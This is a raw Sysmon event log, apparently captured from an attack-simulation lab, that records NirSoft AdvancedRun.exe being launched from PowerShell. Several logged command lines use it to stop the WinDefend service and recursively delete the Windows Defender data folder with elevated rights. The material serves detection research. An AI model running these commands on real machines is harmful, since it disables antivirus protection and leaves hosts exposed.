WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003924231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.037{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003924230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.021{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003924229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.021{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003924228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.031{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /EXEFilename C:\Windows\System32\sc.exeC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003923801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:59.614{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003923721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.116{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.116{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.116{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003923402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:36.257{834264DD-E858-61EA-9802-000000002702}2772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {\""$Env:temp\advancedrun\advancedrun.exe\"" /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run \""$Env:temp\advancedrun\advancedrun.exe\"" \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003917595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:59:41.883{834264DD-E67D-61EA-4B02-000000002702}5456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003917193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:59:21.882{834264DD-E669-61EA-4802-000000002702}5080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003916444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:56.348{834264DD-E650-61EA-3F02-000000002702}6008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003916031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:50.177{834264DD-E64A-61EA-3B02-000000002702}740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\\advancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\\advancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003915622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:27.655{834264DD-E633-61EA-3802-000000002702}2152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\AdvancedRun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003915098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:58:09.418{834264DD-E621-61EA-3502-000000002702}172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\x07dvancedrun\AdvancedRun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $env:TEMP\x07dvancedrun\AdvancedRun.exe 